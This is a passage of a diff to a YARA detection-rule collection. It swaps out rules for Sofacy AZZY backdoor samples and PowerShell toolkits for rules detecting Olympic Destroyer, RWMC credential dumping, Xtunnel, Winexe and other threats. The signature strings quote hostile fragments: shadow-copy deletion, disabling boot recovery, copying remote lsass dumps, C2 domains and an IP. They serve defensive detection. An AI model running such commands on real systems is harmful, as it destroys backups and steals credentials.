-		$s5 = " Microsoft Corporation. All rights reserved.               " fullword wide
+		$op1 = {8B 45 FC 48 63 D0 48 8B 45 A8 48 01 C2 8B 45 BC C1 F8 04 83 E0 0F 48 98 0F B6 44 05 E0 88 02}
+		$op2 = {8B 45 FC 48 98 48 8D 50 01 48 8B 45 A8 48 01 C2 8B 45 BC 83 E0 0F 48 98 0F B6 44 05 C0 88 02}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and all of them
 }
-rule SIGNATURE_BASE_Sofacy_Malware_AZZY_Backdoor_1 : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Stackstring_Technique_Jan25 : FILE
 {
 	meta:
-		description = "AZZY Backdoor - Sample 1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "184dc45e-8014-5dcf-a033-d77586c60fdf"
-		date = "2015-12-04"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L25-L40"
+		description = "Detects suspicious Linux binaries using stack-based string manipulation techniques, which are often used to generate PTY (pseudo-terminal) device names for stealth or persistence, seen being used by SEASPY and Bluez backdoors"
+		author = "MalGamy (Nextron System)"
+		id = "6c81d8c1-0cfa-54d9-89d3-2b025cc22f13"
+		date = "2025-01-23"
+		modified = "2025-03-20"
+		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/seaspy_backdoor_jan25.yar#L24-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a9dc96d45702538c2086a749ba2fb467ba8d8b603e513bdef62a024dfeb124cb"
-		logic_hash = "9c99f218d856d374423cada147bc38c8319f9ebff1e43e012143fad7af992d29"
+		hash = "0e65a80c6331a0e8d7df05ac217a8a7fe03b88f1d304f2ff0a26b92ed89153f3"
+		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
+		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
+		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
+		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
+		hash = "654b7c5b667e4d70ebb5fb1807dcd1ee5b453f45424eb59a287d86ad8d0598a1"
+		hash = "ac6a8ec0b92935b7faab05ca21a42ed9eecdc9243fcf1449cc8f050de38e4c4f"
+		logic_hash = "6efc2d7bd6ba1f39554bd6c378e5adb209419c90192fcba0a676b557e5b920b5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "advstorshell.dll" fullword wide
-		$s1 = "advshellstore.dll" fullword ascii
-		$s2 = "Windows Advanced Storage Shell Extension DLL" fullword wide
+		$op1 = {C7 45 E0 70 71 72 73 C7 45 E4 74 75 76 77 C7 45 E8 78 79 7A 61 C7 45 EC 62 63 64 65 C6 45 F0 00 C7 45 C0 30 31 32 33 C7 45 C4 34 35 36 37 C7 45 C8 38 39 61 62 C7 45 CC 63 64 65 66}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and $op1
 }
-rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Implant_1 : FILE
+rule SIGNATURE_BASE_Reveal_Memorycredentials : FILE
 {
 	meta:
-		description = "AZZY Backdoor Implant 4.3 - Sample 1"
+		description = "Auto-generated rule - file Reveal-MemoryCredentials.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec6bf8ca-ccb9-532e-8b0d-1fba59efa2da"
-		date = "2015-12-04"
+		id = "ca06c702-45fe-5ab5-b53e-c3f7b7006570"
+		date = "2015-08-31"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L42-L59"
+		reference = "https://github.com/giMini/RWMC/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rwmc_powershell_creddump.yar#L8-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1bab1a3e0e501d3c14652ecf60870e483ed4e90e500987c35489f17a44fef26c"
-		logic_hash = "b6ddf1274ed78db0c7183e3cc8063c01e4d011bc2947ec05449f3fd0df2050e7"
+		hash = "893c26818c424d0ff549c1fbfa11429f36eecd16ee69330c442c59a82ce6adea"
+		logic_hash = "d740462aacd3b30d0258d018344642683fefd43ef033dd7f5bdde2bdddce4115"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\tf394kv.dll" wide
-		$s2 = "DWN_DLL_MAIN.dll" fullword ascii
-		$s3 = "?SendDataToServer_2@@YGHPAEKEPAPAEPAK@Z" ascii
-		$s4 = "?Applicate@@YGHXZ" ascii
-		$s5 = "?k@@YGPAUHINSTANCE__@@PBD@Z" ascii
+		$s1 = "$dumpAProcessPath = \"C:\\Windows\\temp\\msdsc.exe\"" fullword ascii
+		$s2 = "$user = Get-ADUser -Filter {UserPrincipalName -like $loginPlainText -or sAMAccountName -like $loginPlainText}" fullword ascii
+		$s3 = "Copy-Item -Path \"\\\\$computername\\\\c$\\windows\\temp\\lsass.dmp\" -Destination \"$logDirectoryPath\"" fullword ascii
+		$s4 = "if($backupOperatorsFlag -eq \"true\") {$loginPlainText = $loginPlainText + \" = Backup Operators\"}            " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Sofacy_AZZY_Backdoor_Helperdll : FILE
+rule SIGNATURE_BASE_Minidumptest_Msdsc : FILE
 {
 	meta:
-		description = "Dropped C&C helper DLL for AZZY 4.3"
+		description = "Auto-generated rule - file msdsc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eae089a0-21dc-5d6e-a4bc-7181dc9b8b35"
-		date = "2015-12-04"
+		id = "044ae157-aba2-5935-9afc-8a12853c84bc"
+		date = "2015-08-31"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L61-L76"
+		reference = "https://github.com/giMini/RWMC/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rwmc_powershell_creddump.yar#L26-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6cd30c85dd8a64ca529c6eab98a757fb326de639a39b597414d5340285ba91c6"
-		logic_hash = "100903551eeacf4266fc97a09949bdafe05e94698bed7cea295c8e970df22ec8"
-		score = 75
+		hash = "477034933918c433f521ba63d2df6a27cc40a5833a78497c11fb0994d2fd46ba"
+		logic_hash = "ae8a28df245a8f7a2d62639789c31556b012322fcac09784595fd6f95d6bf195"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "snd.dll" fullword ascii
-		$s1 = "InternetExchange" fullword ascii
-		$s2 = "SendData"
+		$s1 = "MiniDumpTest1.exe" fullword wide
+		$s2 = "MiniDumpWithTokenInformation" fullword ascii
+		$s3 = "MiniDumpTest1" fullword wide
+		$s6 = "Microsoft 2008" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen1 : FILE
+rule SIGNATURE_BASE_Destructive_Ransomware_Gen1 : FILE
 {
 	meta:
-		description = "Generic rule to detect Sofacy Malware Collector Stealer"
+		description = "Detects destructive malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9462dd9-f6b6-59f4-a443-12d6f3be444e"
-		date = "2015-12-04"
+		id = "3a7ce55e-fb28-577b-91bb-fe02d7b3d73c"
+		date = "2018-02-12"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L80-L97"
+		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_olympic_destroyer.yar#L13-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1b6693fa45fed5ed001d8fb4b43427c7036d95cb36b125e7242864d000085018"
+		logic_hash = "1f7a41c5a7e812e0e26b346cc6465290b17aff31620cbcf6e01c569d8eea2dbd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
-		hash2 = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+		hash1 = "ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85"
 
 	strings:
-		$s0 = "NvCpld.dll" fullword ascii
-		$s1 = "NvStop" fullword ascii
-		$s2 = "NvStart" fullword ascii
+		$x1 = "/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" fullword wide
+		$x2 = "delete shadows /all /quiet" fullword wide
+		$x3 = "delete catalog -quiet" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen2 : FILE
+
+rule SIGNATURE_BASE_Olympicdestroyer_Gen2 : FILE
 {
 	meta:
-		description = "File collectors / USB stealers - Generic"
+		description = "Detects Olympic Destroyer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03ced94f-de20-56c5-bf17-1ec7d8610684"
-		date = "2015-12-04"
+		id = "8d0cbb7b-6650-53ed-8d58-176f8b4af880"
+		date = "2018-02-12"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L99-L116"
+		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_olympic_destroyer.yar#L30-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e917166adf6e1135444f327d8fff6ec6c6a8606d65dda4e24c2f416d23b69d45"
-		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
-		hash = "b1f2d461856bb6f2760785ee1af1a33c71f84986edf7322d3e9bd974ca95f92d"
-		logic_hash = "2086b4119bae17ec984665ea1e49d5f496a2cf6bf05ab507fe0cfb6e28039349"
+		logic_hash = "1bcf0e95d9de62271a09f6ac64ce65debc91e541e1fccfe5c31661466c00bd5e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d915016"
+		hash2 = "3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2"
+		hash3 = "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
+		hash4 = "28858cc6e05225f7d156d1c6a21ed11188777fa0a752cb7b56038d79a88627cc"
 
 	strings:
-		$s1 = "msdetltemp.dll" fullword ascii
-		$s2 = "msdeltemp.dll" fullword wide
-		$s3 = "Delete Temp Folder Service" fullword wide
+		$x1 = "cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt" fullword wide
+		$x2 = "cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^(\"Scripting.FileSystemObject\"^)" wide
+		$x3 = "del %programdata%\\evtchk.txt" fullword wide
+		$x4 = "Pyeongchang2018.com\\svc_all_swd_installc" fullword ascii
+		$s1 = "<STARTCRED>" fullword wide
+		$s2 = "SELECT ds_cn FROM ds_computer" fullword wide
+		$s3 = "\\system32\\notepad.exe" wide
+		$s4 = "%s \\\\%s -u \"%s\" -p \"%s\" -accepteula -d %s %s \"%s\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "fd7200dcd5c0d9d4d277a26d951210aa" or pe.imphash ( ) == "975087e9286238a80895b195efb3968d" or pe.imphash ( ) == "da1c2d7acfe54df797bfb1f470257bc3" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen3 : FILE
+rule SIGNATURE_BASE_REGEORG_Tuneller_Generic : FILE
 {
 	meta:
-		description = "File collectors / USB stealers - Generic"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d2ee1a22-6aae-51fc-9043-a7ba99769376"
-		date = "2015-12-04"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Mandiant"
+		id = "a87979b7-2732-5a32-b3f3-a815a58b6589"
+		date = "2021-12-20"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_dec15.yar#L118-L143"
+		reference = "https://www.mandiant.com/resources/unc3524-eye-spy-email"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/webshell_regeorg.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
-		hash = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
-		logic_hash = "8e7f56013629d8b4d0c7600552590e8073deb16d5b6dced11444c2110b88f387"
+		hash = "ba22992ce835dadcd06bff4ab7b162f9"
+		logic_hash = "1657928875c3cd2d5bf774929b0497d78f0211b321f8a4138cc9b8c80b9f99d6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		date_modified = "2021-12-20"
 
 	strings:
-		$s1 = "NvCpld.dll" fullword ascii
-		$s4 = "NvStart" fullword ascii
-		$s5 = "NvStop" fullword ascii
-		$a1 = "%.4d%.2d%.2d%.2d%.2d%.2d%.2d%.4d" fullword wide
-		$a2 = "IGFSRVC.dll" fullword wide
-		$a3 = "Common User Interface" fullword wide
-		$a4 = "igfsrvc Module" fullword wide
-		$b1 = " Operating System                        " fullword wide
-		$b2 = "Microsoft Corporation                                       " fullword wide
+		$s1 = "System.Net.IPEndPoint"
+		$s2 = "Response.AddHeader"
+		$s3 = "Request.InputStream.Read"
+		$s4 = "Request.Headers.Get"
+		$s5 = "Response.Write"
+		$s6 = "System.Buffer.BlockCopy"
+		$s7 = "Response.BinaryWrite"
+		$s8 = "SocketException soex"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $s* ) and ( all of ( $a* ) or all of ( $b* ) ) )
+		filesize < 1MB and 7 of them
 }
-rule SIGNATURE_BASE_APT_Fnv1A_Plus_Extra_XOR_In_MSIL_Experimental : FILE
+rule SIGNATURE_BASE_Apt_Sofacy_Xtunnel : FILE
 {
 	meta:
-		description = "This rule detects the specific MSIL implementation of fnv1a of the SUNBURST backdoor (standard fnv1a + one final XOR before RET) independent of the XOR-string. (fnv64a_offset and fnv64a_prime are standard constants in the fnv1a hashing algorithm.)"
-		author = "Arnim Rupp"
-		id = "5505f7ff-eca5-5274-bdd1-dbbd648c3ccc"
-		date = "2020-12-22"
+		description = "Sofacy Malware - German Bundestag"
+		author = "Claudio Guarnieri"
+		id = "aef091b5-cedf-5443-ab61-8b2dbc7e77fd"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_backdoor_sunburst_fnv1a_experimental.yar#L2-L24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6db212b21fec8d2c1b4cff9e32bdc027835ed660e7552b49f4418e7d0b35ca11"
-		score = 50
+		logic_hash = "2478d9d8996bf4a142e39eac0e2d6af718d364be080a89530812615595777efd"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
-		hash2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
-		hash3 = "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134"
 
 	strings:
-		$fnv64a_offset = { 25 23 22 84 e4 9c f2 cb }
-		$fnv64a_prime_plus_gap_plus_xor_ret = { B3 01 00 00 00 01 [8-40] 61 2A 00 00 }
+		$xaps = ":\\PROJECT\\XAPS_"
+		$variant11 = "XAPS_OBJECTIVE.dll"
+		$variant12 = "start"
+		$variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
+		$variant22 = "is you live?"
+		$mix1 = "176.31.112.10"
+		$mix2 = "error in select, errno %d"
+		$mix3 = "no msg"
+		$mix4 = "is you live?"
+		$mix5 = "127.0.0.1"
+		$mix6 = "err %d"
+		$mix7 = "i`m wait"
+		$mix8 = "hello"
+		$mix9 = "OpenSSL 1.0.1e 11 Feb 2013"
+		$mix10 = "Xtunnel.exe"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0xCFD0 ) ) and ( ( $xaps ) or ( all of ( $variant1* ) ) or ( all of ( $variant2* ) ) or ( 6 of ( $mix* ) ) )
 }
-rule SIGNATURE_BASE_Trojan_Win32_Adupib_1 : PLATINUM
+
+rule SIGNATURE_BASE_Winexe_Remoteexec : FILE
 {
 	meta:
-		description = "Adupib SSL Backdoor"
-		author = "Microsoft"
-		id = "fb3b10a4-66d7-50ec-b6a5-b3c5c382ef01"
-		date = "2016-04-12"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ms_platinum.yara#L101-L122"
+		description = "Winexe tool for remote execution (also used by Sofacy group)"
+		author = "Florian Roth (Nextron Systems), Robert Simmons"
+		id = "5079557a-0461-5b04-b0f2-4265bf7ec041"
+		date = "2015-06-19"
+		modified = "2021-02-11"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L26-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd"
-		logic_hash = "4d93b6a041468b51763d9497acf3d01ee59ac05f1807a6b140c557ef96d26df9"
-		score = 75
+		logic_hash = "9e944f07b43b934346c0e88685014c05ff81561ac2f7c3374b55b9c4523b98c1"
+		score = 70
 		quality = 85
-		tags = "PLATINUM"
-		unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b"
-		activity_group = "Platinum"
-		version = "1.0"
+		tags = "FILE"
+		hash1 = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
+		hash2 = "d19dfdbe747e090c5aa2a70cc10d081ac1aa88f360c3f378288a3651632c4429"
 
 	strings:
-		$str1 = "POLL_RATE"
-		$str2 = "OP_TIME(end hour)"
-		$str3 = "%d:TCP:*:Enabled"
-		$str4 = "%s[PwFF_cfg%d]"
-		$str5 = "Fake_GetDlgItemTextW: ***value***="
+		$s1 = "error Cannot LogonUser(%s,%s,%s) %d" ascii fullword
+		$s2 = "error Cannot ImpersonateNamedPipeClient %d" ascii fullword
+		$s3 = "\\\\.\\pipe\\ahexec" fullword ascii
+		$s4 = "\\\\.\\pipe\\wmcex" fullword ascii
+		$s5 = "implevel" fullword ascii
 
 	condition:
-		$str1 and $str2 and $str3 and $str4 and $str5
+		uint16( 0 ) == 0x5a4d and filesize < 115KB and ( 3 of them or pe.imphash ( ) == "2f8a475933ac82b8e09eaf26b396b54d" )
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Powerup : FILE
+rule SIGNATURE_BASE_Sofacy_Mal2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file PowerUp.ps1"
+		description = "Sofacy Group Malware Sample 2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff3eeec3-602d-5824-8a50-aed2081f49bc"
-		date = "2016-09-04"
+		id = "1547cc67-7d7c-5ec9-816c-15b7d523376a"
+		date = "2015-06-19"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L10-L31"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L50-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64562c623de89df59d15db48990c25886c67b79ac9341cf8f21ef372057ccd85"
-		score = 80
+		hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
+		logic_hash = "c325ed815b7de3338363d064f4097edf0596644d4ef8d642fda3664a2a16c2eb"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
 
 	strings:
-		$s1 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir /text:vdir.name\" | % { " fullword ascii
-		$s2 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppools /text:name\" | % { " fullword ascii
-		$s3 = "if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {" fullword ascii
-		$s4 = "C:\\Windows\\System32\\InetSRV\\appcmd.exe list vdir /text:physicalpath | " fullword ascii
-		$s5 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe\"))" fullword ascii
-		$s6 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\InetSRV\\appcmd.exe\")) {" fullword ascii
-		$s7 = "Write-Verbose \"Executing command '$Cmd'\"" fullword ascii
-		$s8 = "Write-Warning \"[!] Target service" fullword ascii
+		$x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
+		$x2 = "XAPS_OBJECTIVE.dll" fullword ascii
+		$s1 = "i`m wait" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 4000KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) and $s1
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce : FILE
+rule SIGNATURE_BASE_Sofacy_Mal3 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Inveigh-BruteForce.ps1"
+		description = "Sofacy Group Malware Sample 3"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cdc298d3-f9ac-5472-bdc9-0dc51ad91e4a"
-		date = "2016-09-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L33-L49"
+		id = "67d002ef-4ed9-54ce-a6ef-49b7f3b951e2"
+		date = "2015-06-19"
+		modified = "2023-01-06"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L69-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b23b6ad66e054e435415464262004ead6e7ee121185d76c02110506293b3867b"
-		score = 80
+		hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
+		logic_hash = "80c433cf5b3d042e46b5441a1b027c5ecf571f30571064904a33e92677633e66"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$s1 = "Import-Module .\\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 " fullword ascii
-		$s2 = "$(Get-Date -format 's') - Attempting to stop HTTP listener\")|Out-Null" fullword ascii
-		$s3 = "Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1" fullword ascii
+		$s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii
+		$s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii
+		$s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii
+		$s4 = "<font size=4 color=red>process is exist</font>" fullword ascii
+		$s5 = ".winnt.check-fix.com" ascii
+		$s6 = ".update.adobeincorp.com" ascii
+		$s7 = ".microsoft.checkwinframe.com" ascii
+		$s8 = "adobeincorp.com" fullword wide
+		$s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii
+		$x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
+		$x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
+		$x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xbbef and filesize < 300KB and 1 of them ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $s* ) or ( 1 of ( $s* ) and all of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Shellcode : FILE
+rule SIGNATURE_BASE_Sofacy_Bundestag_Batch : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Invoke-Shellcode.ps1"
+		description = "Sofacy Bundestags APT Batch Script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "193d64b6-ffba-55fb-ab95-9c78552b8d68"
-		date = "2016-09-04"
+		id = "869dafec-1387-5640-b608-b84cf0d43342"
+		date = "2015-06-19"
 		modified = "2023-12-05"
-		reference = "https://github.com/vysec/ps1-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_toolkit.yar#L51-L69"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_xtunnel_bundestag.yar#L101-L116"
